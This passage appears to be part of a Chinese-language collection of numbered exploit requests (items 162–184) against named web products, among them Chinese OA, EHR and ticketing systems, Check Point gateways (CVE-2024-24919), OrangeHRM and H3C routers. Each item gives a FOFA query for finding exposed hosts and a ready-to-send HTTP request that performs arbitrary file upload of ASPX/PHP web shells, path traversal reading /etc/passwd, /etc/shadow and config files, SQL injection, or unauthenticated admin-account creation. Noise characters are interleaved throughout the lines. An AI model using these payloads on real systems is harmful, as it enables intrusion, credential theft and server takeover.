9 X5 i& M7 M5 J1 S4 ~+ N! p<soap:Envelope xmlns:xsi="
7 B) b& D. x8 s mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|3 p8 o. ^' I" q, exmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! G5 k, b- d; Y/ }<soap:Body>! U( L* u. ?$ Z/ l
<UploadResume xmlns="http://tempuri.org/">
- g5 T% C* L& M<ip>1</ip>
: g1 l1 ?6 Z) ` [" g! g% B<fileName>../../../../dizxdell.aspx</fileName>. E7 R4 `- b8 O4 C8 Z
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>- t* N# X5 r) c8 o2 W7 m
<tag>3</tag>
. _2 V7 e, }" ]' B k</UploadResume>
+ r: |6 e' V4 M</soap:Body>6 x# p9 i8 J# I3 J. t4 |$ W: d
</soap:Envelope>4 @! Q6 R6 p" \
o/ E0 j) {8 c
1 [! j2 j i, Z0 Q2 x9 lhttp://x.x.x.x/dizxdell.aspx4 F, K% X( }+ e" F( f, g! ~1 R
$ B/ e2 a: v, t7 {9 Q9 _162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传( k8 O- J4 {6 a
FOFA: app="和丰山海-数字标牌"
* v2 F# x/ g1 h3 U _: `0 rPOST /QH.aspx HTTP/1.1
& J: Q9 [. e% ?; ]Host: x.x.x.x/ s9 {* V7 X+ F" ], c+ z* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0$ l; z# a ^% @9 \+ L& |
Connection: close* p# `. }1 O% g2 U' \2 \1 Y2 c
Content-Length: 583$ n2 [; M Z8 h/ c3 _: ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
J8 p8 w1 s. d T5 @$ \1 _4 h! GAccept-Encoding: gzip9 Y9 w2 b3 M2 {
4 f( E& b% ?1 Q* G( N r------WebKitFormBoundaryeegvclmyurlotuey
; z4 R( F5 I6 W7 [' O$ KContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
0 \: l2 w- d- ?3 _3 Z5 X: @% t8 r" sContent-Type: application/octet-stream! H. v% d6 B8 N3 D1 G' ` k
6 _4 i9 V( i$ q! g$ s/ Q/ ]<% response.write("ujidwqfuuqjalgkvrpqy") %> B R+ S; f8 G4 }7 I" K
------WebKitFormBoundaryeegvclmyurlotuey1 z) N- I0 [3 {! p6 N" H
Content-Disposition: form-data; name="action"
& ^7 @" Q" @- q! k" }% _% t, N W- u" K2 b1 D! Q9 w$ C9 w
upload
8 b( p. ~3 v2 T6 [------WebKitFormBoundaryeegvclmyurlotuey
, m) j" {4 R7 ~8 D3 Z6 T0 f; b: \Content-Disposition: form-data; name="responderId"
; M8 e- P) @2 W0 t9 w, ~) u' I8 f- ?( J$ G: `; J. ~1 a
ResourceNewResponder
& J0 o" v9 X+ S% m3 _& @------WebKitFormBoundaryeegvclmyurlotuey# j) X1 C9 V* J
Content-Disposition: form-data; name="remotePath"8 r9 n3 n7 k1 D9 l- t
. W/ B2 h1 |9 l e- W5 G. c/opt/resources
% V$ m( g# M& E* D9 ^' H- `------WebKitFormBoundaryeegvclmyurlotuey--
$ R/ O7 {/ O; t6 F( s m! b; O+ _
2 N# s" |9 f! q4 w" F7 d( s( |7 q/ p1 @& d9 r0 y4 W8 a
http://x.x.x.x/opt/resources/kjuhitjgk.aspx) ], b3 j( @- @+ }
$ h2 q5 {* p0 g" U163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; W% @$ V7 j; f, Y
FOFA: icon_hash="-795291075"
" c) I9 h2 U( `. V1 Q/ [POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.10 B, l U) c5 o$ M: H9 H# Z; Z
Host: x.x.x.x# \* X1 o* m0 u6 u6 p8 R* v/ W* c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.361 a2 L9 Q1 g( r+ y! M, Q& S: l( x; N
Connection: close9 Z/ j4 _4 t0 Y( z- V9 F. D* ~
Content-Length: 293
y! O4 ?* v U+ \8 @0 s! n4 [Accept: */*" j3 K/ _- S* H8 @/ `
Accept-Encoding: gzip, deflate- }, Y4 n/ W9 I' d. d3 e' S" t
Accept-Language: zh-CN,zh;q=0.98 q1 b9 n' U) g' O9 n; Q( j4 `. |/ E
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod9 t1 ]9 b% A4 `' z% N
5 A2 C/ Q# N- @6 Y3 T& y
------iiqvnofupvhdyrcoqyuujyetjvqgocod
$ b3 \8 U _5 e3 M- k* H6 H) {Content-Disposition: form-data; name="name"
+ h' x7 z7 t0 Y" C" y4 s' I& J6 g( v% j6 m' Q- g: j8 G, m
1.php9 o9 b! \- P. U- w3 t4 r- U6 L
------iiqvnofupvhdyrcoqyuujyetjvqgocod
! s$ z e- d: `2 QContent-Disposition: form-data; name="upfile"; filename="1.php"
6 ^% {( p. o+ IContent-Type: image/jpeg! c& {6 o! M) {! y
' W. R1 a$ k5 x8 r6 h* p$ v lrvjhvbhwwuooyiioxega
; M7 d# O3 x. o' _------iiqvnofupvhdyrcoqyuujyetjvqgocod--5 M9 V( l0 B: @0 L
0 t" A7 s; V/ r2 ^% q3 z9 n& B7 Z) I' O6 P. o$ t0 Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
" d% x n t- ^1 J$ rFOFA: title="智慧综合管理平台登入"
& I* u; B" @) D$ _% }5 {0 I7 mPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.12 z4 P& _7 a: x. `( x+ r, o) _
Host: x.x.x.x* O4 I+ R+ q9 |4 A& \( G7 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0! f/ \$ H7 Q% b
Content-Length: 288
) [+ i8 r: H; Q9 s4 ~Accept: application/json, text/javascript, */*; q=0.01- n$ e2 V9 F( p3 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,9 Z9 {% J0 }. E8 v
Connection: close
, ~* i9 R) F4 D2 P0 mContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
0 K- ]! Z; j+ ?" U) f3 Z$ hX-Requested-With: XMLHttpRequest
9 U( v: A% q; K& J4 |! fAccept-Encoding: gzip
7 {' y5 p) N, o8 O' f# W% ~' ^5 Z3 S0 `: I h2 T/ @
------dqdaieopnozbkapjacdbdthlvtlyl
' O' M% g t% E( e/ ZContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
7 X6 K I9 a9 F* G. ]* ~Content-Type: image/jpeg1 ?5 h$ `( A( [( A) ]; `
) s; v$ P, c* U9 b1 L; t
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 S0 ]- R5 ]* h/ p2 B8 u------dqdaieopnozbkapjacdbdthlvtlyl-- y3 Q+ S: e: h, s2 V7 s: |# d
5 B* a, L2 I+ o& I' q$ ^- O' p
3 M4 G" g6 R5 ?4 }4 f' a! k2 j4 ehttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
( x6 {7 w f) _" r& i1 B
2 I' U4 |' Y6 [# ^165. OrangeHRM 3.3.3 SQL 注入* Q$ x; R% ?: [/ N& S6 n
CVE-2024-36428
+ d% ^; Q- }- I$ L2 n; AFOFA: app="OrangeHRM-产品"
! Y' K/ H) _ }2 sURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
; U; D! n. {3 }4 v2 H
+ q: y# u" [- B0 G; e+ D
5 {) t' @- u, [0 ]4 }166. 中成科信票务管理平台SeatMapHandler SQL注入" u7 m4 S8 Z6 q# ?7 M
FOFA:body="技术支持:北京中成科信科技发展有限公司"
' Y' n3 C j$ \. } V1 |! w3 sPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
9 U1 S# G% `- q+ A5 nHost:
: ?8 L# B6 L, e1 ^# ZPragma: no-cache
( X- L4 ^ C. E+ ] g6 p- D* pCache-Control: no-cache- ~- o+ |5 Q4 i6 v# [& t' a
Upgrade-Insecure-Requests: 1 e4 Z5 ~5 G' A: z0 u) z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.364 f1 x* l" d: H; m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- T0 x2 f2 P5 a. v8 Q. l
Accept-Encoding: gzip, deflate
( n) G( W; d2 Z6 ?. O. s" tAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
! B5 ~" E: F- H- [2 p* P9 jCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE# @( L0 L, ^7 F j. ]% u7 R
Connection: close
! P* q+ S* S3 ?" S0 jContent-Type: application/x-www-form-urlencoded
}+ u3 O" f6 r: _3 YContent-Length: 89! L% H# f7 H) e9 ~8 \5 L
- w8 C( l9 `. \8 X( n$ ?. m( \# z
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
/ I4 S, d0 K1 l8 G( T3 B, h6 x) O1 w" G5 I9 t' Z
% o4 P' ?! H7 I' ?, P7 c167. 精益价值管理系统 DownLoad.aspx任意文件读取
' P8 Z7 K5 o) c/ |9 u; DFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx". I7 y9 u6 C; y: I0 v1 L g# c" k
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1+ v5 d" x$ }* ?# }2 V9 G' z2 t
Host:
b. ?0 j/ N; T0 J% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- \3 J$ {* o. v. F3 @2 E
Content-Type: application/x-www-form-urlencoded
( l! z" H! |* L! ]! lAccept-Encoding: gzip, deflate
# q/ Q1 b' j3 L6 CAccept: */*
" e1 X3 _6 |! [" i7 o2 _Connection: keep-alive
. Y) `8 ~$ p2 j0 W/ j& c. e# i d
- |! \6 B8 s0 W. ?- _2 V( e* E1 F7 f3 ^: [ S
168. 宏景EHR OutputCode 任意文件读取* L2 i+ {4 y) } n4 y
FOFA:app="HJSOFT-HCM"3 |5 F1 P' b s D L: Q
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
% y2 X9 h$ J9 Y) @# c, tHost: your-ip
' }5 T3 b Z" T I. l, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
1 k, N0 ]9 U$ j0 F: @Content-Type: application/x-www-form-urlencoded
' Y$ \) v/ [# H4 u6 y$ g; CConnection: close
$ s/ _! |9 S8 F1 E, t+ L* U# e' A; N' L) e# f, S
6 K; {* J1 |1 w/ {: }+ |- J
9 `2 F& o2 H0 n/ a* m# R9 j
169. 宏景EHR downlawbase SQL注入
7 R5 g; P8 s( e+ U# N$ mFOFA:app="HJSOFT-HCM", I; @. s- {" E. z: Z: t8 R& K- c( Z
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1; ^* Q \* C0 u4 q0 O! f# A( u) q
Host: your-ip: \. K6 V0 D6 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 L% m7 g7 G4 ? Y5 kAccept: */*" h) y( V9 l5 Q, i v! J
Accept-Encoding: gzip, deflate; h+ P4 }1 ^ _6 S% g) h' D( p
Connection: close Z/ `2 |1 e7 R4 U5 g9 U9 }+ W
4 R5 F! T$ A7 [; w s! R" | {
; }1 B4 B2 ~- p% d8 m2 [
. T3 u0 k# s4 Y) { m+ [% G& B
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; G2 d( I {- T& `' \& Y4 C' C7 AFOFA:body="/general/sys/hjaxmanage.js"
! _! L$ @' Y* G9 o+ b7 ]9 j% a1 zPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1" e' D9 e/ c2 s5 u+ v- Q/ |
Host: balalanengliang
" B/ p/ s+ n q0 O) DUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% }, f$ x2 @7 j, G: w6 P, s( g/ hContent-Type: application/x-www-form-urlencoded0 _- Z! A8 l. x
) `, P) S) M( a( y9 ~ Q" t- {3 x
filename=../webapps/ROOT/WEB-INF/web.xml
- X) g$ D, f0 ]) d
9 W9 h9 ]- v0 E; O2 d$ w8 f3 f( T5 U4 w& j
171. 通天星CMSV6车载定位监控平台 SQL注入
2 G3 R( V. w& ?8 i6 ]/ y) sFOFA:body="/808gps/" d* p7 J/ t- U( U' m% O
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.14 ^- A/ I1 o5 W; |/ e4 U V
Host: your-ip
! z' f+ m0 O1 u7 n; lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0% ]: Q' v. R! l
Accept: */*( A. W+ {. L, J1 `. a8 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- l) ]% a, ~; V F$ J: P0 l. i5 }Accept-Encoding: gzip, deflate$ q* X( e" D2 a6 u0 I$ F6 o
Connection: close
- n/ I/ W [, u7 i1 d! F! A
: x( D9 n7 M6 q% I3 C7 ~8 u& c: f7 W1 |( G& k: O! e
1 h: a: Q( t+ q# }$ e& N& h, P
172. DT-高清车牌识别摄像机任意文件读取( s8 W' z5 m7 h. x- \. b. |
FOFA:app="DT-高清车牌识别摄像机"
; M) H* F. p0 s2 [$ ~GET /../../../../etc/passwd HTTP/1.1
) ^, h3 s9 \- Z. T" lHost: your-ip/ {8 {7 h; h0 @2 C2 N8 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ Q' P1 |9 @" A" kAccept-Encoding: gzip, deflate
c* x% |3 Z- E8 _) pAccept: */*7 L, N4 d, O& P0 k2 {+ q- p2 o
Connection: keep-alive
: Y2 }( j7 \: N) p( z4 c' H: a' O! n+ O# {: r; E1 A0 X
( ]5 }. m6 Q6 P/ y- W; j- [1 e! `9 N& }- P$ p8 V
173. Check Point 安全网关任意文件读取
) V7 \4 U) @& n$ V- eCVE-2024-24919
) @. v, j$ J. j! @ @, KFOFA:app="Check_Point-SSL-Network-Extender"6 E7 q v4 g! b/ F
POST /clients/MyCRL HTTP/1.1$ q6 D6 V7 f8 L
Host: your-ip. i. e9 n3 \6 M# M; ]
Content-Type: application/x-www-form-urlencoded
. K) b1 n4 E, y6 q% L9 w1 \" B" B/ m6 r: E2 ]
aCSHELL/../../../../../../../etc/shadow' M: t) j2 L+ |* Y6 C' X
7 u* }( Y- |2 e9 X# Z- I
" Q9 y9 Q" j1 z! C* X& {% m8 r/ s% x, X& k7 i% ^# z' {
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
! k* h0 d! W3 r7 t( H. ~FOFA:app="金和网络-金和OA"
) \. @- M4 Y2 R, G w Z/ xGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
, r, s2 o: w: gHost: your-ip0 k' I2 Q* |6 y' {0 }8 P: i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; Z& Y) a% b$ n3 V8 U p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 m& U3 y4 |% ~0 q! _8 m/ FAccept-Encoding: gzip, deflate, br
8 G6 j$ `; o% DAccept-Language: zh-CN,zh;q=0.9
3 u0 j" l9 L( T) t+ A6 t# hConnection: close
8 F5 l: J! R q
+ i W: E6 o$ j% F/ _! v1 m) m& \: C
5 l" W. y" u; ]: V# U
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入4 k: [) u, B+ Z: U- u* r/ n* ~
FOFA:app="金和网络-金和OA"! s- S1 \8 [$ B) h) z9 l9 o5 O
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
+ p3 ~" R f0 t; B% YHost:
- a) n5 P- {, H4 I4 t9 i6 ~User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 _, ]$ J4 ^: d. L2 U: V$ ~. l# n2 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" j$ X2 ]4 j+ _: b" y/ [9 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( Q; M" S7 `4 j/ WAccept-Encoding: gzip, deflate& [2 Z/ U: R/ Z+ E3 J, a5 m# V( U
Connection: close
) D6 E4 L( h) ?% M# K' \Upgrade-Insecure-Requests: 1
; [) n6 C! I$ V! X0 D; c/ q- X$ M( {+ Z4 v
+ I% F8 |7 |3 T
176. 电信网关配置管理系统 rewrite.php 文件上传+ R- T) w6 I, c% h$ k
FOFA:body="img/login_bg3.png" && body="系统登录"# k: g0 c8 a/ I' e
POST /manager/teletext/material/rewrite.php HTTP/1.11 n$ I7 Z) `0 P! l2 X7 t6 L
Host: your-ip7 c2 N# t! ]+ H) r- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 y S" n% e+ V! F' t3 j1 y6 K" x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
+ C. o% t) d5 i9 K; ?Connection: close
. b l. n" L, l% `/ D0 b
4 z% O+ C F0 m. { S------WebKitFormBoundaryOKldnDPT
5 G, q/ e# w% R# i; Y* L; w+ ZContent-Disposition: form-data; name="tmp_name"; filename="test.php"" ?% Q* T N8 x; Z& ]' w
Content-Type: image/png9 \6 U. q# P) G& u8 \
. t$ \1 |* |* W; N8 K( p- [3 ?+ j
<?php system("cat /etc/passwd");unlink(__FILE__);?>
! x: C) R& m; Z3 v6 M. @. a------WebKitFormBoundaryOKldnDPT& m" d9 I8 o) ]0 B( d1 I# O
Content-Disposition: form-data; name="uploadtime"0 B) p2 K8 D& i5 A$ d/ z
4 T' V% W p1 H3 W* P
/ p9 ]2 U/ D$ l. s! M0 j( u0 f, a------WebKitFormBoundaryOKldnDPT--+ X( X4 U. A0 i+ ^
+ ~7 a# m& E# ?6 a& w
) ^1 f& Q+ B: a3 f: b
/ l! v( w2 c; O7 T: F( V
177. H3C路由器敏感信息泄露
f/ p' m) N9 R5 x/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg9 K% q( f8 O+ E4 B( `
/userLogin.asp/../actionpolicy_status/../M60.cfg
( X6 V! u; J' Z* ^4 `/ w0 Y% y( X& X/userLogin.asp/../actionpolicy_status/../GR8300.cfg
( D A" O8 S6 d5 Q' M! J7 y# z; h/userLogin.asp/../actionpolicy_status/../GR5200.cfg
3 v( ?8 d' y. s3 w: F4 M4 [/userLogin.asp/../actionpolicy_status/../GR3200.cfg! u# S7 n7 t( P& d( k
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
u& H$ r1 W( J% S" K4 S/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
4 f, @0 `* p1 ^* ~4 w' {+ |/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 y, j- K+ z5 c9 [& _
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
7 C. G; Q( h) o0 x; K/ T# g% b8 n/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg) x! d* P6 R% b0 i2 T
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
, o' B' }0 w4 d5 d9 |/userLogin.asp/../actionpolicy_status/../ER5100.cfg
: |6 o7 N8 u C: h/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
# t2 `) v' H! Z/userLogin.asp/../actionpolicy_status/../ER3260.cfg
+ e% v) Y) U4 A; d6 ^& }/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
) L" Q# K$ S5 F( m( t0 f( b- G/userLogin.asp/../actionpolicy_status/../ER3200.cfg) L. i6 k, @" g' m0 @/ }
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg: H. ]# m; u- K2 W3 y( l+ h0 K0 K* k
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
8 S! o" \1 ]8 E/ y; Q1 h4 ?/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg+ d/ |4 ~' R" v
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/ p) `1 e1 `- P _1 c/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
( {+ f1 Z0 o, l
- C! l6 d" ~3 O; C1 C: C! n
% n E. }' V J- l& |4 A0 A. D178. H3C校园网自助服务系统-flexfileupload-任意文件上传
7 E {) I( @# r2 }% u/ K' [6 mFOFA:header="/selfservice"* M" y' k6 v1 D9 X1 B( Q% D
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1% K% x% l4 s8 _& a$ a$ ~) j
Host:3 B* [8 f0 D( N- U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. m, u0 S6 E' P! P
Content-Length: 252
9 g& Y8 @5 I, W L/ o% |- BAccept-Encoding: gzip, deflate
- G) x7 U; ^4 M' v3 uConnection: close$ Y) ?- i# ]+ O% \8 z% @
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l3 O: u- R* \9 `3 M9 z$ Q' B7 m
-----------------aqutkea7vvanpqy3rh2l+ q+ s, F8 K% g% @& X. Y5 V. K; R
Content-Disposition: form-data; name="12234.txt"; filename="12234"
8 m" g4 r- O4 n1 PContent-Type: application/octet-stream9 z, b: z! z! S/ L
Content-Length: 2555 h+ c* t. I. C3 {
0 |8 _! Q& s. y) v# ]12234
9 Q# X: n W* c) n( R-----------------aqutkea7vvanpqy3rh2l--5 Z, `5 W& j7 b$ W8 p2 U8 w4 C
+ a) r1 v. S( \) M# W0 e* ]: k+ M3 {2 ]: ~4 _# t" m$ g; O
GET /imc/primepush/%2e%2e/flex/12234.txt5 A* J ?* D* t
& @% C# q! P. s3 }
Q3 q& q% y+ A! i9 }7 n5 ^# ~4 p# K179. 建文工程管理系统存在任意文件读取; M3 A$ Q* Q' w/ ^2 n) R5 {' u X
POST /Common/DownLoad2.aspx HTTP/1.1
+ @+ z/ ~. b% W" s8 l' C! AHost: {{Hostname}}
6 }& B1 y# `6 q. b5 @9 DContent-Type: application/x-www-form-urlencoded
* Z) T! F) o1 b! O8 A+ q2 MUser-Agent: Mozilla/5.0) p% J _7 R4 c8 r
7 E9 @! A' m- ]! @' d0 f" C: Opath=../log4net.config&Name=, @; t, X/ M# q' k) N# Y( D; }
G1 _/ p8 {. l W6 m+ w# C9 @# r- {. w0 E: I+ a& y! z% p$ \
180. 帮管客 CRM jiliyu SQL注入
% n: X$ [; R7 R+ QFOFA:app="帮管客-CRM"( C3 m: Y3 h( Z+ @
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1, h j2 j- k& l& V) R5 C$ R. \
Host: your-ip2 Q [* F& U% \8 W+ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' o8 S9 B9 q, [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 j2 U9 C/ [" v4 T. gAccept-Encoding: gzip, deflate1 y: q, y8 H% d8 v- `- |1 t
Accept-Language: zh-CN,zh;q=0.9
r+ C2 z9 Z) yConnection: close& [4 Z& N2 }. d4 L W/ M
: r& O2 L- }9 s
j8 k- W8 d! |% Q
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% l, ~' d0 V+ aFOFA:"PDCA/js/_publicCom.js"
: c4 u5 v2 h$ D- f/ OPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1. r6 g8 ~' v+ y' g% [8 P1 A
Host: your-ip2 S$ h. @- K+ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' l: R3 l, t8 Q: Q4 W: B7 @5 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. [, H8 u8 `! `0 e: H/ v9 |
Accept-Encoding: gzip, deflate, br
% Q" w9 ~( b+ t. q( q9 M: ]' n0 MAccept-Language: zh-CN,zh;q=0.9
4 l+ e: \- M3 N k& E* T2 u) c$ e; V# MConnection: close% t- ~7 J& a3 z! z
Content-Type: application/x-www-form-urlencoded
: o1 e4 [) ~) z. n) W O: t+ v- Q3 D- u; V
5 B7 A: c% E% D6 A- ~
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
9 T4 O# H6 i1 i0 v* w
0 C5 z3 w) h/ S/ J+ s; u" K Y. E' J! L; ]+ O o& Q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建 G! P+ X) F7 v! g7 j
FOFA:"PDCA/js/_publicCom.js"
" E/ Q, e, U9 j7 Q$ DPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
; f, J3 D4 a/ D' OHost: your-ip I; C/ D. ~" h& S4 n2 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 l) O( x1 ? ]/ k% K) `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
}9 N" W8 e% L2 Y2 fAccept-Encoding: gzip, deflate, br8 l3 K3 D7 d8 N# }; {
Accept-Language: zh-CN,zh;q=0.9
, N! b4 _( K1 d: N, q2 ~Connection: close
; g& B3 K4 p( S' Z9 m& |Content-Type: application/x-www-form-urlencoded
3 T! g' a! ]# h. _4 p
f9 Z6 y+ X& O! P7 @ M/ v; ]9 U: @% t: r0 K9 u
username=test1234&pwd=test1234&savedays=1" @5 s2 G; r9 @6 C! u
]5 d. S7 V- g) z7 c+ H
8 r9 T- r: e" ~: D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
9 a9 F3 b9 i/ h. G- L- E) ?* t6 ?FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"' S3 r$ H' Y1 D% o3 }: S
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
4 v [; h9 p0 _3 g0 J# E DHost: your-ip
" U! _! ?/ O9 p# ?* J+ r% O0 P# G kUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; }# v" P* E% m' b6 Q" j: }0 [Accept-Charset: utf-8
/ e5 F6 X. V0 e8 \8 _( {3 |Accept-Encoding: gzip, deflate& w. J, D: P' `# g4 O
Connection: close1 R2 h2 E' b2 A% y
" w; y, ]" F2 O" y: ?
! [( i5 v5 U! C184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' u' ?" y, o& L5 E- F: A' N4 jFOFA:server="SunFull-Webs"
" S/ R& R" O* ]7 B c5 DPOST /soap/AddUser HTTP/1.1
) ` @1 C7 z6 R0 u& z% ?$ D4 H: [Host: your-ip
9 }0 H5 Q6 T" @: `/ KAccept-Encoding: gzip, deflate
& B& \' F" ?0 A: {4 ?# }- oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& k* H3 ?" J1 g, Y. W9 h. K% k+ k0 e g
Accept: application/xml, text/xml, */*; q=0.010 s& b, h2 p5 m6 Q }% G1 Y. ]
